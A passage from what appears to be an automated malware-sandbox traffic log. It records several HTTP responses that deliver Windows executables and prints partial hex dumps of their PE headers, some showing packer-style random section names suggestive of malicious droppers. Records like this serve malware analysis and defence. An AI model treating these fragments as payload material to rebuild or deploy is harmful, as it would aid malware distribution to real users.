00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 6f 72 62 65 6f 7a 7a 00 c0 2a 00 00 b0 05 00 00 b6 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 76 7a 65 79 65 75 69 00 10 00 00 00 70 30 00 00 04 00 00 00 4a 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 30 00 00 22 00 00 00 4e 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:25 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:34 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Mon, 04 Nov 2024 15:50:39 GMTConnection: keep-aliveETag: "6728ed4f-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 ed 28 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 37 93 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:32:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:42 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:42 GMTContent-Type: application/octet-streamContent-Length: 2795520Last-Modified: Mon, 04 Nov 2024 15:51:04 GMTConnection: keep-aliveETag: "6728ed68-2aa800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 c8 d6 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 6b 75 61 78 76 74 6c 00 60 2a 00 00 a0 00 00 00 48 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 68 66 68 78 78 75 74 00 20 00 00 00 00 2b 00 00 04 00 00 00 82 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 86 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:33:03 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 